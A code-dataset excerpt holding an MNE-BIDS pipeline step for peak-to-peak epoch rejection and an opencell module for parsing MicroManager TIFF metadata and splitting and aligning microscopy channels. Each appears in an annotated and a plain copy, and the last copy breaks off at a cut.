    epochs = mne.read_epochs(fname_in, preload=True)
    reject = config.get_reject(epochs=epochs)

    if cfg.ica_reject is not None:
        for ch_type, threshold in cfg.ica_reject.items():
            if (ch_type in reject and
                    threshold < reject[ch_type]):
                # This can only ever happen in case of
                # reject = 'autoreject_global'
                msg = (f'Adjusting PTP rejection threshold proposed by '
                       f'autoreject, as it is greater than ica_reject: '
                       f'{ch_type}: {reject[ch_type]} -> {threshold}')
                logger.info(**gen_log_kwargs(message=msg,
                                             subject=subject, session=session))
                reject[ch_type] = threshold

    msg = f'Using PTP rejection thresholds: {reject}'
    logger.info(**gen_log_kwargs(message=msg, subject=subject,
                                 session=session))

    n_epochs_before_reject = len(epochs)
    epochs.reject_tmin = cfg.reject_tmin
    epochs.reject_tmax = cfg.reject_tmax
    epochs.drop_bad(reject=reject)
    n_epochs_after_reject = len(epochs)

    if 0 < n_epochs_after_reject < 0.5 * n_epochs_before_reject:
        msg = ('More than 50% of all epochs rejected. Please check the '
               'rejection thresholds.')
        logger.warning(**gen_log_kwargs(message=msg, subject=subject,
                                        session=session))
    elif n_epochs_after_reject == 0:
        raise RuntimeError('No epochs remaining after peak-to-peak-based '
                           'rejection. Cannot continue.')

    msg = 'Saving cleaned, baseline-corrected epochs …'
    # BUG FIX: this message was previously assigned but never emitted,
    # unlike every other `msg` in this function
    logger.info(**gen_log_kwargs(message=msg, subject=subject,
                                 session=session))
    epochs.apply_baseline(cfg.baseline)
    epochs.save(fname_out, overwrite=True)
def get_config(
    subject: Optional[str] = None,
    session: Optional[str] = None
) -> BunchConst:
    """Collect the configuration values this script needs into a BunchConst."""
    settings = dict(
        task=config.get_task(),
        datatype=config.get_datatype(),
        acq=config.acq,
        rec=config.rec,
        space=config.space,
        baseline=config.baseline,
        reject_tmin=config.reject_tmin,
        reject_tmax=config.reject_tmax,
        spatial_filter=config.spatial_filter,
        ica_reject=config.get_ica_reject(),
        deriv_root=config.get_deriv_root(),
        decim=config.decim,
    )
    return BunchConst(**settings)
def main():
    """Run the PTP-based rejection step for every subject/session pair."""
    parallel, run_func, _ = parallel_func(drop_ptp, n_jobs=config.get_n_jobs())
    subjects_sessions = itertools.product(
        config.get_subjects(), config.get_sessions()
    )
    logs = parallel(
        run_func(cfg=get_config(), subject=subj, session=sess)
        for subj, sess in subjects_sessions
    )
    config.save_logs(logs)
if __name__ == '__main__':
main()
| 34.692308
| 79
| 0.601774
|
import itertools
import logging
from typing import Optional
import mne
from mne.utils import BunchConst
from mne.parallel import parallel_func
from mne_bids import BIDSPath
import config
from config import gen_log_kwargs, on_error, failsafe_run
logger = logging.getLogger('mne-bids-pipeline')
@failsafe_run(on_error=on_error, script_path=__file__)
def drop_ptp(*, cfg, subject, session=None):
bids_path = BIDSPath(subject=subject,
session=session,
task=cfg.task,
acquisition=cfg.acq,
run=None,
recording=cfg.rec,
space=cfg.space,
suffix='epo',
extension='.fif',
datatype=cfg.datatype,
root=cfg.deriv_root,
check=False)
infile_processing = cfg.spatial_filter
fname_in = bids_path.copy().update(processing=infile_processing)
fname_out = bids_path.copy().update(processing='clean')
msg = f'Input: {fname_in}, Output: {fname_out}'
logger.info(**gen_log_kwargs(message=msg, subject=subject,
session=session))
epochs = mne.read_epochs(fname_in, preload=True)
reject = config.get_reject(epochs=epochs)
if cfg.ica_reject is not None:
for ch_type, threshold in cfg.ica_reject.items():
if (ch_type in reject and
threshold < reject[ch_type]):
msg = (f'Adjusting PTP rejection threshold proposed by '
f'autoreject, as it is greater than ica_reject: '
f'{ch_type}: {reject[ch_type]} -> {threshold}')
logger.info(**gen_log_kwargs(message=msg,
subject=subject, session=session))
reject[ch_type] = threshold
msg = f'Using PTP rejection thresholds: {reject}'
logger.info(**gen_log_kwargs(message=msg, subject=subject,
session=session))
n_epochs_before_reject = len(epochs)
epochs.reject_tmin = cfg.reject_tmin
epochs.reject_tmax = cfg.reject_tmax
epochs.drop_bad(reject=reject)
n_epochs_after_reject = len(epochs)
if 0 < n_epochs_after_reject < 0.5 * n_epochs_before_reject:
msg = ('More than 50% of all epochs rejected. Please check the '
'rejection thresholds.')
logger.warning(**gen_log_kwargs(message=msg, subject=subject,
session=session))
elif n_epochs_after_reject == 0:
raise RuntimeError('No epochs remaining after peak-to-peak-based '
'rejection. Cannot continue.')
msg = 'Saving cleaned, baseline-corrected epochs …'
epochs.apply_baseline(cfg.baseline)
epochs.save(fname_out, overwrite=True)
def get_config(
subject: Optional[str] = None,
session: Optional[str] = None
) -> BunchConst:
cfg = BunchConst(
task=config.get_task(),
datatype=config.get_datatype(),
acq=config.acq,
rec=config.rec,
space=config.space,
baseline=config.baseline,
reject_tmin=config.reject_tmin,
reject_tmax=config.reject_tmax,
spatial_filter=config.spatial_filter,
ica_reject=config.get_ica_reject(),
deriv_root=config.get_deriv_root(),
decim=config.decim
)
return cfg
def main():
parallel, run_func, _ = parallel_func(drop_ptp, n_jobs=config.get_n_jobs())
logs = parallel(
run_func(cfg=get_config(), subject=subject, session=session)
for subject, session in
itertools.product(config.get_subjects(),
config.get_sessions())
)
config.save_logs(logs)
if __name__ == '__main__':
main()
| true
| true
|
f7050e55af4a52ddeec20cfc5c797671967bb328
| 19,712
|
py
|
Python
|
opencell/imaging/images.py
|
czbiohub/opencell-portal-pub
|
2b056924e4f55490b16349ff0dcf3e719ab516c7
|
[
"Unlicense"
] | 2
|
2022-02-17T16:24:49.000Z
|
2022-03-02T22:26:48.000Z
|
opencell/imaging/images.py
|
czbiohub/opencell-portal-pub
|
2b056924e4f55490b16349ff0dcf3e719ab516c7
|
[
"Unlicense"
] | null | null | null |
opencell/imaging/images.py
|
czbiohub/opencell-portal-pub
|
2b056924e4f55490b16349ff0dcf3e719ab516c7
|
[
"Unlicense"
] | null | null | null |
import datetime
import hashlib
import json
import numpy as np
import pandas as pd
import tifffile
def timestamp():
    """Return the current local time formatted as 'YYYY-MM-DD HH:MM:SS'."""
    return '{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now())
class MicroManagerTIFF:
    """Wrapper around a MicroManager TIFF file.

    Opens the TIFF on construction, accumulates timestamped event messages,
    and parses the per-page MicroManagerMetadata tags into a pandas
    DataFrame (``self.mm_metadata``).
    """

    def __init__(self, src_filepath, verbose=True):
        '''
        src_filepath : path to the TIFF file to open
        verbose : if True, echo each logged event to stdout as it occurs
        '''
        self.verbose = verbose
        self.src_filepath = src_filepath

        self.events = []
        self.global_metadata = {'processing_timestamp': timestamp()}

        self.open_tiff()

    def event_logger(self, message):
        '''
        Record a timestamped event message (echoed to stdout when verbose)
        '''
        if self.verbose:
            print('EVENT: %s' % message)
        self.events.append({'message': message, 'timestamp': timestamp()})

    def save_events(self, dst_filepath):
        # write the logged events to a CSV file (no-op when there are none)
        if not self.events:
            return
        pd.DataFrame(data=self.events).to_csv(dst_filepath, index=False)

    def save_global_metadata(self, dst_filepath):
        # dump the file-level metadata dict as JSON
        with open(dst_filepath, 'w') as file:
            json.dump(self.global_metadata, file)

    def save_mm_metadata(self, dst_filepath):
        # write the parsed per-page MicroManager metadata to CSV
        self.mm_metadata.to_csv(dst_filepath, index=False)

    def calc_hash(self):
        '''
        Calculate the sha1 hash from the file contents

        The hash is also stored in global_metadata under 'sha1_hash'.
        Note that this reads the entire file into memory.
        '''
        sha1 = hashlib.sha1()
        with open(self.src_filepath, 'rb') as file:
            sha1.update(file.read())

        hash_value = sha1.hexdigest()
        self.global_metadata['sha1_hash'] = hash_value
        return hash_value

    def open_tiff(self):
        '''
        Open the stack using tifffile.TiffFile
        '''
        self.tiff = tifffile.TiffFile(self.src_filepath)

    @staticmethod
    def _parse_mm_tag_schema_v1(mm_tag):
        '''
        Parse a MicroManagerMetadata tag in the 'old' schema
        (KC: I believe this schema corresponds to MicroManager 1.x)

        Raises KeyError when the tag does not match this schema
        (the caller catches this and falls back to the v2 parser).
        '''
        metadata = {
            'slice_ind': mm_tag['SliceIndex'],
            'frame_ind': mm_tag['FrameIndex'],
            'channel_ind': mm_tag['ChannelIndex'],
            'position_ind': mm_tag['PositionIndex'],
            'exposure_time': mm_tag['AndorEMCCD-Exposure'],
            'laser_status_405': mm_tag['AndorILE-A-Laser 405-Power Enable'],
            'laser_power_405': mm_tag['AndorILE-A-Laser 405-Power Setpoint'],
            'laser_status_488': mm_tag['AndorILE-A-Laser 488-Power Enable'],
            'laser_power_488': mm_tag['AndorILE-A-Laser 488-Power Setpoint'],
        }
        return metadata

    @staticmethod
    def _parse_mm_tag_schema_v2(mm_tag):
        '''
        Parse a MicroManagerMetadata tag in the 'new' schema
        (KC: I believe this schema corresponds to MicroManager 2.x)

        In this schema the device properties are nested dicts keyed by
        'PropVal'; raises TypeError/KeyError when the tag does not match.
        '''
        metadata = {
            'slice_ind': mm_tag['SliceIndex'],
            'frame_ind': mm_tag['FrameIndex'],
            'channel_ind': mm_tag['ChannelIndex'],
            'position_ind': mm_tag['PositionIndex'],
            'exposure_time': mm_tag.get('Andor EMCCD-Exposure')['PropVal'],
            'laser_status_405': mm_tag.get('Andor ILE-A-Laser 405-Power Enable')['PropVal'],
            'laser_power_405': mm_tag.get('Andor ILE-A-Laser 405-Power Setpoint')['PropVal'],
            'laser_status_488': mm_tag.get('Andor ILE-A-Laser 488-Power Enable')['PropVal'],
            'laser_power_488': mm_tag.get('Andor ILE-A-Laser 488-Power Setpoint')['PropVal'],
        }
        return metadata

    def parse_micromanager_metadata(self):
        '''
        Parse the MicroManager metadata for each page in the TIFF file

        Tries the v1 and then the v2 tag schema on every page; pages whose
        tag is missing or unparseable are flagged with error=True.
        Produces self.mm_metadata (one row per page) and records the
        detected schema version in global_metadata.
        '''
        # the IJMetadata appears only in the first page
        ij_metadata = None
        try:
            ij_metadata = self.tiff.pages[0].tags['IJMetadata'].value['Info']
        except Exception:
            self.event_logger('There was no IJMetadata tag found on the first page')

        if ij_metadata is not None:
            try:
                ij_metadata = json.loads(ij_metadata)
            except Exception:
                self.event_logger('IJMetadata could not be parsed by json.loads')

        mm_metadata_rows = []
        for ind, page in enumerate(self.tiff.pages):
            mm_metadata_row = {
                'page_ind': ind,
                'error': False
            }

            mm_tag = page.tags.get('MicroManagerMetadata')
            if not isinstance(mm_tag, tifffile.tifffile.TiffTag):
                self.event_logger('There was no MicroManagerMetadata tag found on page %s' % ind)
                mm_metadata_row['error'] = True
                mm_metadata_rows.append(mm_metadata_row)
                continue

            # attempt both schemas; exactly one is expected to succeed
            try:
                page_metadata_v1 = self._parse_mm_tag_schema_v1(mm_tag.value)
            except Exception:
                page_metadata_v1 = None
            try:
                page_metadata_v2 = self._parse_mm_tag_schema_v2(mm_tag.value)
            except Exception:
                page_metadata_v2 = None

            page_metadata = {}
            mm_metadata_version = None
            if page_metadata_v1 is not None:
                mm_metadata_version = 'v1'
                page_metadata = page_metadata_v1
            elif page_metadata_v2 is not None:
                mm_metadata_version = 'v2'
                page_metadata = page_metadata_v2
            else:
                mm_metadata_row['error'] = True
                self.event_logger('Unable to parse MicroManagerMetadata tag from page %s' % ind)

            mm_metadata_rows.append({**mm_metadata_row, **page_metadata})

        self.mm_metadata = pd.DataFrame(data=mm_metadata_rows)
        # NOTE: this records the schema version of the *last* parseable page;
        # a mixed-schema file (if one exists) would not be detected here
        self.global_metadata['mm_metadata_version'] = mm_metadata_version
class RawPipelineTIFF(MicroManagerTIFF):
    """A raw, two-channel (405/488) 'Pipeline-like' MicroManager TIFF.

    Extends MicroManagerTIFF with metadata validation, per-laser channel
    splitting, intensity projections, z-profiles, and approximate
    alignment/cropping of the stacks around the cell layer.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # the channels we expect to find in a Pipeline-like TIFF
        self.laser_405 = '405'
        self.laser_488 = '488'

    def validate_micromanager_metadata(self):
        '''
        Validate the parsed MicroManager metadata tags for a raw Pipeline-like TIFF file
        (these are TIFFs found in the 'PlateMicroscopy' directory)

        Generates validated_mm_metadata and sets various flags
        that determine whether and how to split the pages into the 405 and 488 channels

        Steps
        ------
        - drop rows with any NAs
        - check that the dropped rows had a parsing error
        - check for two channel_inds and an equal number of pages from each
        - if there are no channel_inds, check for an even number of pages
        - if there are two channel_inds, check that slice_inds
          and exposure settings are consistent within each channel
        '''
        # whether the MM metadata has two channel inds with an equal number of slices
        self.has_valid_channel_inds = False

        # whether the MM metadata for each channel has slice_inds that increment by one
        self.has_valid_slice_inds = False

        # whether it is safe to split the TIFF stack into channels by splitting
        # the pages in half, when there are not valid channel inds
        self.safe_to_split_in_half = False

        md = self.mm_metadata.copy()

        # remove the error flag column
        errors = md['error']
        md = md.drop(labels='error', axis=1)

        # drop rows with NAs in any of the columns parsed from the MicroManagerMetadata tag
        parsed_columns = set(md.columns).difference(['page_ind'])
        md = md.dropna(how='any', subset=parsed_columns, axis=0)

        # check that the dropped rows had an error
        # (note that 'error' means either there was no MM tag or it could not be parsed)
        num_error_rows = errors.sum()
        num_dropped_rows = self.mm_metadata.shape[0] - md.shape[0]
        if num_dropped_rows != num_error_rows:
            self.event_logger(
                '%s rows with NAs were dropped but %s rows had errors'
                % (num_dropped_rows, num_error_rows)
            )

        # check that we can coerce the parsed columns as expected
        int_columns = ['slice_ind', 'channel_ind']
        for column in int_columns:
            md[column] = md[column].apply(int)

        float_columns = ['laser_power_405', 'laser_power_488', 'exposure_time']
        for column in float_columns:
            md[column] = md[column].apply(float)

        # if there are two distinct channels, we assign the first to 405 and the second to 488
        self.channel_inds = None
        unique_channel_inds = sorted(md.channel_ind.unique())
        if len(unique_channel_inds) == 2:
            self.channel_inds = {
                self.laser_405: min(unique_channel_inds),
                self.laser_488: max(unique_channel_inds),
            }

        # if there are three channel_inds, we assume the third channel is brightfield
        elif set(unique_channel_inds) == set([0, 1, 2]):
            self.event_logger('There were three channel inds')
            self.channel_inds = {
                self.laser_405: 0,
                self.laser_488: 1,
            }

        # if there's one channel index, check for an even number of pages
        elif len(unique_channel_inds) == 1:
            if np.mod(md.shape[0], 2) == 0:
                self.safe_to_split_in_half = True
            else:
                self.event_logger('There is one channel_ind and an odd number of pages')
        else:
            self.event_logger('Unexpected number of channel_inds (%s)' % unique_channel_inds)

        # if there were valid channel_inds, check for an equal number of pages from each channel
        if self.channel_inds is not None:
            num_405 = (md.channel_ind == self.channel_inds[self.laser_405]).sum()
            num_488 = (md.channel_ind == self.channel_inds[self.laser_488]).sum()
            if num_405 == num_488:
                self.has_valid_channel_inds = True
            else:
                self.event_logger(
                    'Channels have unequal number of slices: %s and %s' % (num_405, num_488)
                )

        # in each channel, check that slice_ind increments by 1.0
        # and that exposure time and laser power are consistent
        for channel_ind in unique_channel_inds:
            md_channel = md.loc[md.channel_ind == channel_ind]
            steps = np.unique(np.diff(md_channel.slice_ind))

            # check that slice inds are contiguous
            if len(steps) == 1 and steps[0] == 1:
                self.has_valid_slice_inds = True
            elif len(steps) == 1:
                self.event_logger(
                    'Unexpected slice_ind increment %s for channel_ind %s'
                    % (steps[0], channel_ind)
                )
            elif len(steps) > 1:
                self.event_logger(
                    'The slice_inds are not contiguous for channel_ind %s' % channel_ind
                )

            for column in float_columns:
                steps = np.unique(np.diff(md_channel[column]))
                # BUG FIX: np.diff returns an empty array for a single-page
                # channel, so unconditionally indexing steps[0] raised an
                # IndexError; only inspect steps[0] when it exists
                if len(steps) > 1 or (len(steps) == 1 and steps[0] != 0):
                    self.event_logger(
                        'Inconsistent values found in column %s for channel_ind %s'
                        % (column, channel_ind)
                    )

        self.validated_mm_metadata = md

    @staticmethod
    def tag_and_coerce_metadata(row, tag):
        '''
        Transform `row` to a dict, append `tag` to each key,
        and coerce values to float where possible
        (note: the tag is appended, not prepended, to the key)
        '''
        d = {}
        for key, val in dict(row).items():
            key = '%s_%s' % (key, tag)
            try:
                val = float(val)
            except Exception:
                pass
            d[key] = val
        return d

    def split_channels(self):
        '''
        Split the pages of the pipeline-like TIFF into 405 and 488 channels
        to construct the z-stack for each channel and, if possible,
        extract the channel-specific MM metadata (i.e., exposure time and laser power)

        Overview
        --------
        In a perfect world, this would be easy: we would simply use the two unique channel_inds
        to split the pages by channel (and verify the page order using the slice_inds).

        Unfortunately, due to a bug, the MM metadata tag in some TIFFs is the same on every page
        (this is notably true for 'disentangled' TIFFs from Plates 16,17,18).
        In these cases, we split the tiff into channels simply by splitting the pages in half.

        Note that we use the flags set in self.validate_micromanager_metadata to determine
        which of these methods to use.

        Assignment of channels
        ----------------------
        When there are two valid channel_inds, the 405 laser is assigned
        to the lower channel_ind (which is either 0 or -1).
        When there are no channel_inds, the 405 laser is assigned
        to the first half of the pages.
        '''
        self.did_split_channels = True
        self.stacks = {}
        md = self.validated_mm_metadata.copy()

        if self.has_valid_channel_inds:
            for channel_name in (self.laser_405, self.laser_488):
                channel_md = md.loc[md.channel_ind == self.channel_inds[channel_name]]
                # channel-wide settings are taken from the channel's first page
                self.global_metadata.update(
                    self.tag_and_coerce_metadata(channel_md.iloc[0], tag=channel_name)
                )
                self.stacks[channel_name] = self.concat_pages(channel_md.page_ind.values)

        elif self.safe_to_split_in_half:
            # no per-channel metadata is available in this case
            n = int(md.shape[0]/2)
            self.stacks[self.laser_405] = self.concat_pages(md.iloc[:n].page_ind.values)
            self.stacks[self.laser_488] = self.concat_pages(md.iloc[n:].page_ind.values)
        else:
            self.event_logger('Unable to safely split pages by channel')
            self.did_split_channels = False

    def concat_pages(self, page_inds):
        '''
        Stack the given TIFF pages into a single numpy array
        (first axis is the page/z index)
        '''
        stack = np.array([self.tiff.pages[ind].asarray() for ind in page_inds])
        return stack

    def project_stack(self, channel_name, axis, dst_filepath=None):
        '''
        Generate x-, y-, or z-projections and log the max and min intensities

        Errors (e.g. a missing channel in self.stacks) are logged as events
        rather than raised.
        '''
        axis_inds = {'x': 1, 'y': 2, 'z': 0}
        if axis not in axis_inds.keys():
            raise ValueError("Axis must be one of 'x', 'y', or 'z'")
        axis_ind = axis_inds[axis]

        try:
            proj = self.stacks[channel_name].max(axis=axis_ind)
            minmax = {
                'min_intensity': int(proj.min()),
                'max_intensity': int(proj.max()),
            }
            self.global_metadata.update(self.tag_and_coerce_metadata(minmax, tag=channel_name))
            if dst_filepath is not None:
                tifffile.imsave(dst_filepath, proj)
        except Exception:
            self.event_logger(
                'An error occured while %s-projecting the %s channel' % (axis, channel_name)
            )

    def calculate_z_profiles(self, channel):
        '''
        Calculate various statistics of the intensities for each z-slice
        (min, max, mean, and 99.99th percentile, each cast to int)
        '''
        stack = self.stacks[channel]
        return {
            'min': np.array([zslice.min() for zslice in stack]).astype(int),
            'max': np.array([zslice.max() for zslice in stack]).astype(int),
            'mean': np.array([zslice.mean() for zslice in stack]).astype(int),
            'p9999': np.array([np.percentile(zslice, 99.99) for zslice in stack]).astype(int),
        }

    @staticmethod
    def find_cell_layer(stack):
        '''
        Estimate the center of the cell layer using the center of mass
        of the z-profile of the mean intensity of the Hoechst staining

        Returns (center_of_mass, raw_profile), where center_of_mass is a
        float z-position and raw_profile is the per-slice mean intensity.
        '''
        # z-profile of the mean intensity in the Hoechst channel
        raw_profile = np.array([zslice.mean() for zslice in stack]).astype(float)

        # subtract the mean and clip negatives so the center of mass
        # is dominated by the bright (cell-layer) slices
        profile = raw_profile - raw_profile.mean()
        profile[profile < 0] = 0

        x = np.arange(len(profile))
        center_of_mass = (profile * x).sum()/profile.sum()
        return center_of_mass, raw_profile

    def align_cell_layer(
        self, cell_layer_bottom, cell_layer_top, step_size, bottom_wiggle_room=0
    ):
        '''
        Approximately align the 405 and 488 stacks to correct for chromatic aberration,
        and crop around the cell layer so that it is in the center of the stack

        cell_layer_bottom : the position of the bottom of the cell layer, in microns,
            relative to the center of the cell layer (should be negative)
        cell_layer_top : the position of the top of cell layer, in microns,
            relative to the center (should be positive)
        step_size : the z-step size of the stack (in microns)
            (note that the step size is not included in the MicroManager metadata,
            so it must be provided by the user)
        bottom_wiggle_room : optional 'wiggle room', in microns, for the cell_layer_bottom;
            if the actual bottom of the stack is within this distance of cell_layer_bottom,
            the stack is still cropped, and the bottom of the cropped stack padded with zeros.
            For example, if cell_layer_bottom is -5um but the actual bottom is at -4.5um,
            setting bottom_wiggle_room to 1um would allow the stack to be cropped
            (because -4.5 + 5 < 1)

        Returns (stacks, result): stacks is {'405': ..., '488': ...} (or empty
        on failure) and result is a dict of diagnostic parameters, with an
        'error' key set on failure.
        '''
        stacks = {}
        result = {}

        stack_405 = self.stacks[self.laser_405].copy()
        stack_488 = self.stacks[self.laser_488].copy()

        # hard-coded chromatic aberration offset in microns
        # this is an empirically estimated median offset,
        # obtained by inspecting z-stacks from nucleus-localized targets
        chromatic_aberration_offset = 1.0
        offset_ind = int(chromatic_aberration_offset/step_size)

        # BUG FIX: when step_size > 1.0, offset_ind is 0 and the slice
        # stack_405[:-0] would yield an *empty* stack; only shift the stacks
        # when the offset spans at least one z-slice
        if offset_ind > 0:
            stack_405 = stack_405[:-offset_ind, :, :]
            stack_488 = stack_488[offset_ind:, :, :]

        # estimate the cell layer center and round it to the nearest z-slice
        cell_layer_center, _ = self.find_cell_layer(stack_405)
        cell_layer_center = np.round(cell_layer_center)

        # absolute position, in number of z-slices, of the top and bottom of the cell layer
        bottom_ind = int(np.floor(cell_layer_center + cell_layer_bottom/step_size))
        top_ind = int(np.ceil(cell_layer_center + cell_layer_top/step_size))

        # log some parameters (for debugging, mostly)
        result['padded'] = False
        result['stack_shape'] = stack_405.shape
        result['crop_window'] = [bottom_ind, top_ind]
        result['cell_layer_center'] = cell_layer_center
        result['chromatic_aberration_offset'] = offset_ind

        pad_depth = None
        if bottom_ind < 0:
            # the requested bottom is below the stack; pad later if it is
            # within the allowed wiggle room, otherwise fail
            if abs(bottom_ind) <= np.round(bottom_wiggle_room/step_size):
                pad_depth = abs(bottom_ind)
                bottom_ind = 0
            else:
                result['error'] = 'The cell layer center was too close to the bottom of the stack'
                return stacks, result

        if top_ind >= stack_405.shape[0]:
            result['error'] = 'The cell layer center was too close to the top of the stack'
            return stacks, result

        stack_405 = stack_405[bottom_ind:top_ind, :, :]
        stack_488 = stack_488[bottom_ind:top_ind, :, :]

        # pad the bottom of the stack if necessary
        if pad_depth:
            result['padded'] = True
            result['pad_depth'] = pad_depth
            padding = np.zeros((pad_depth, *stack_405.shape[1:]), dtype=stack_405.dtype)
            stack_405 = np.concatenate((padding, stack_405), axis=0)
            stack_488 = np.concatenate((padding, stack_488), axis=0)

        stacks = {'405': stack_405, '488': stack_488}
        return stacks, result
| 38.20155
| 98
| 0.605976
|
import datetime
import hashlib
import json
import numpy as np
import pandas as pd
import tifffile
def timestamp():
return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
class MicroManagerTIFF:
def __init__(self, src_filepath, verbose=True):
self.verbose = verbose
self.src_filepath = src_filepath
self.events = []
self.global_metadata = {'processing_timestamp': timestamp()}
self.open_tiff()
def event_logger(self, message):
if self.verbose:
print('EVENT: %s' % message)
self.events.append({'message': message, 'timestamp': timestamp()})
def save_events(self, dst_filepath):
if not self.events:
return
pd.DataFrame(data=self.events).to_csv(dst_filepath, index=False)
def save_global_metadata(self, dst_filepath):
with open(dst_filepath, 'w') as file:
json.dump(self.global_metadata, file)
def save_mm_metadata(self, dst_filepath):
self.mm_metadata.to_csv(dst_filepath, index=False)
def calc_hash(self):
sha1 = hashlib.sha1()
with open(self.src_filepath, 'rb') as file:
sha1.update(file.read())
hash_value = sha1.hexdigest()
self.global_metadata['sha1_hash'] = hash_value
return hash_value
def open_tiff(self):
self.tiff = tifffile.TiffFile(self.src_filepath)
@staticmethod
def _parse_mm_tag_schema_v1(mm_tag):
metadata = {
'slice_ind': mm_tag['SliceIndex'],
'frame_ind': mm_tag['FrameIndex'],
'channel_ind': mm_tag['ChannelIndex'],
'position_ind': mm_tag['PositionIndex'],
'exposure_time': mm_tag['AndorEMCCD-Exposure'],
'laser_status_405': mm_tag['AndorILE-A-Laser 405-Power Enable'],
'laser_power_405': mm_tag['AndorILE-A-Laser 405-Power Setpoint'],
'laser_status_488': mm_tag['AndorILE-A-Laser 488-Power Enable'],
'laser_power_488': mm_tag['AndorILE-A-Laser 488-Power Setpoint'],
}
return metadata
@staticmethod
def _parse_mm_tag_schema_v2(mm_tag):
metadata = {
'slice_ind': mm_tag['SliceIndex'],
'frame_ind': mm_tag['FrameIndex'],
'channel_ind': mm_tag['ChannelIndex'],
'position_ind': mm_tag['PositionIndex'],
'exposure_time': mm_tag.get('Andor EMCCD-Exposure')['PropVal'],
'laser_status_405': mm_tag.get('Andor ILE-A-Laser 405-Power Enable')['PropVal'],
'laser_power_405': mm_tag.get('Andor ILE-A-Laser 405-Power Setpoint')['PropVal'],
'laser_status_488': mm_tag.get('Andor ILE-A-Laser 488-Power Enable')['PropVal'],
'laser_power_488': mm_tag.get('Andor ILE-A-Laser 488-Power Setpoint')['PropVal'],
}
return metadata
def parse_micromanager_metadata(self):
ij_metadata = None
try:
ij_metadata = self.tiff.pages[0].tags['IJMetadata'].value['Info']
except Exception:
self.event_logger('There was no IJMetadata tag found on the first page')
if ij_metadata is not None:
try:
ij_metadata = json.loads(ij_metadata)
except Exception:
self.event_logger('IJMetadata could not be parsed by json.loads')
mm_metadata_rows = []
for ind, page in enumerate(self.tiff.pages):
mm_metadata_row = {
'page_ind': ind,
'error': False
}
mm_tag = page.tags.get('MicroManagerMetadata')
if not isinstance(mm_tag, tifffile.tifffile.TiffTag):
self.event_logger('There was no MicroManagerMetadata tag found on page %s' % ind)
mm_metadata_row['error'] = True
mm_metadata_rows.append(mm_metadata_row)
continue
try:
page_metadata_v1 = self._parse_mm_tag_schema_v1(mm_tag.value)
except Exception:
page_metadata_v1 = None
try:
page_metadata_v2 = self._parse_mm_tag_schema_v2(mm_tag.value)
except Exception:
page_metadata_v2 = None
page_metadata = {}
mm_metadata_version = None
if page_metadata_v1 is not None:
mm_metadata_version = 'v1'
page_metadata = page_metadata_v1
elif page_metadata_v2 is not None:
mm_metadata_version = 'v2'
page_metadata = page_metadata_v2
else:
mm_metadata_row['error'] = True
self.event_logger('Unable to parse MicroManagerMetadata tag from page %s' % ind)
mm_metadata_rows.append({**mm_metadata_row, **page_metadata})
self.mm_metadata = pd.DataFrame(data=mm_metadata_rows)
self.global_metadata['mm_metadata_version'] = mm_metadata_version
class RawPipelineTIFF(MicroManagerTIFF):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.laser_405 = '405'
self.laser_488 = '488'
def validate_micromanager_metadata(self):
self.has_valid_channel_inds = False
self.has_valid_slice_inds = False
self.safe_to_split_in_half = False
md = self.mm_metadata.copy()
errors = md['error']
md = md.drop(labels='error', axis=1)
parsed_columns = set(md.columns).difference(['page_ind'])
md = md.dropna(how='any', subset=parsed_columns, axis=0)
num_error_rows = errors.sum()
num_dropped_rows = self.mm_metadata.shape[0] - md.shape[0]
if num_dropped_rows != num_error_rows:
self.event_logger(
'%s rows with NAs were dropped but %s rows had errors'
% (num_dropped_rows, num_error_rows)
)
int_columns = ['slice_ind', 'channel_ind']
for column in int_columns:
md[column] = md[column].apply(int)
float_columns = ['laser_power_405', 'laser_power_488', 'exposure_time']
for column in float_columns:
md[column] = md[column].apply(float)
self.channel_inds = None
unique_channel_inds = sorted(md.channel_ind.unique())
if len(unique_channel_inds) == 2:
self.channel_inds = {
self.laser_405: min(unique_channel_inds),
self.laser_488: max(unique_channel_inds),
}
elif set(unique_channel_inds) == set([0, 1, 2]):
self.event_logger('There were three channel inds')
self.channel_inds = {
self.laser_405: 0,
self.laser_488: 1,
}
elif len(unique_channel_inds) == 1:
if np.mod(md.shape[0], 2) == 0:
self.safe_to_split_in_half = True
else:
self.event_logger('There is one channel_ind and an odd number of pages')
else:
self.event_logger('Unexpected number of channel_inds (%s)' % unique_channel_inds)
# if there were valid channel_inds, check for an equal number of pages from each channel
if self.channel_inds is not None:
num_405 = (md.channel_ind == self.channel_inds[self.laser_405]).sum()
num_488 = (md.channel_ind == self.channel_inds[self.laser_488]).sum()
if num_405 == num_488:
self.has_valid_channel_inds = True
else:
self.event_logger(
'Channels have unequal number of slices: %s and %s' % (num_405, num_488)
)
# in each channel, check that slice_ind increments by 1.0
# and that exposure time and laser power are consistent
for channel_ind in unique_channel_inds:
md_channel = md.loc[md.channel_ind == channel_ind]
steps = np.unique(np.diff(md_channel.slice_ind))
# check that slice inds are contiguous
if len(steps) == 1 and steps[0] == 1:
self.has_valid_slice_inds = True
elif len(steps) == 1:
self.event_logger(
'Unexpected slice_ind increment %s for channel_ind %s'
% (steps[0], channel_ind)
)
elif len(steps) > 1:
self.event_logger(
'The slice_inds are not contiguous for channel_ind %s' % channel_ind
)
for column in float_columns:
steps = np.unique(np.diff(md_channel[column]))
if len(steps) > 1 or steps[0] != 0:
self.event_logger(
'Inconsistent values found in column %s for channel_ind %s'
% (column, channel_ind)
)
self.validated_mm_metadata = md
@staticmethod
def tag_and_coerce_metadata(row, tag):
d = {}
for key, val in dict(row).items():
key = '%s_%s' % (key, tag)
try:
val = float(val)
except Exception:
pass
d[key] = val
return d
def split_channels(self):
self.did_split_channels = True
self.stacks = {}
md = self.validated_mm_metadata.copy()
if self.has_valid_channel_inds:
for channel_name in (self.laser_405, self.laser_488):
channel_md = md.loc[md.channel_ind == self.channel_inds[channel_name]]
self.global_metadata.update(
self.tag_and_coerce_metadata(channel_md.iloc[0], tag=channel_name)
)
self.stacks[channel_name] = self.concat_pages(channel_md.page_ind.values)
elif self.safe_to_split_in_half:
n = int(md.shape[0]/2)
self.stacks[self.laser_405] = self.concat_pages(md.iloc[:n].page_ind.values)
self.stacks[self.laser_488] = self.concat_pages(md.iloc[n:].page_ind.values)
else:
self.event_logger('Unable to safely split pages by channel')
self.did_split_channels = False
def concat_pages(self, page_inds):
